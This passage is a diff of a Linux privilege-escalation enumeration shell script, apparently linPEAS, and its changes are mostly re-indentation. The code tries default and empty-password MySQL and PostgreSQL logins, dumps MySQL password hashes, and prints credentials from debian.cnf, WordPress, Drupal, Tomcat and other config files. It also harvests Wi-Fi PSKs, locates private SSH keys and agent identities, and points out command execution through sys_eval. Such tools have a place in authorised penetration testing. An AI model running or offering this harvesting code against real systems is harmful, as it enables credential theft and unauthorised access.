MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... " +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" fi done - else echo_not_found - fi - echo "" + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" - print_2title "Analyzing MariaDB Files (limit 70)" + print_2title "Analyzing MariaDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PostgreSQL Files (limit 70)" + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; @@ -2441,37 +2403,37 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - print_2title "Analyzing Mongo Files (limit 70)" + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + + print_2title "Analyzing Mongo Files (limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - print_2title "Analyzing Apache Files (limit 70)" + print_2title "Analyzing Apache Files (limit 70)" echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null @@ -2480,70 +2442,70 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Tomcat Files (limit 70)" + print_2title "Analyzing Tomcat Files (limit 70)" if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - print_2title "Analyzing FastCGI Files (limit 70)" + + print_2title "Analyzing FastCGI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Http conf Files (limit 70)" + print_2title "Analyzing Http conf Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Htpasswd Files (limit 70)" + print_2title "Analyzing Htpasswd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PHP Sessions Files (limit 70)" + print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Wordpress Files (limit 70)" + print_2title "Analyzing Wordpress Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Drupal Files (limit 70)" + print_2title "Analyzing Drupal Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - print_2title "Analyzing Moodle Files (limit 70)" + print_2title "Analyzing Moodle Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Supervisord Files (limit 70)" + print_2title "Analyzing Supervisord Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Cesi Files (limit 70)" + print_2title "Analyzing Cesi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Rsync Files (limit 70)" + print_2title "Analyzing Rsync Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Hostapd Files (limit 70)" + print_2title "Analyzing Hostapd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" - print_2title "Analyzing Anaconda ks Files (limit 70)" + print_2title "Analyzing Anaconda ks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing VNC Files (limit 70)" + print_2title "Analyzing VNC Files (limit 70)" if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; @@ -2551,23 +2513,23 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Ldap Files (limit 70)" + print_2title "Analyzing Ldap Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing OpenVPN Files (limit 70)" + print_2title "Analyzing OpenVPN Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - print_2title "Analyzing SSH Files (limit 70)" + print_2title "Analyzing SSH Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; @@ -2575,243 +2537,243 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read 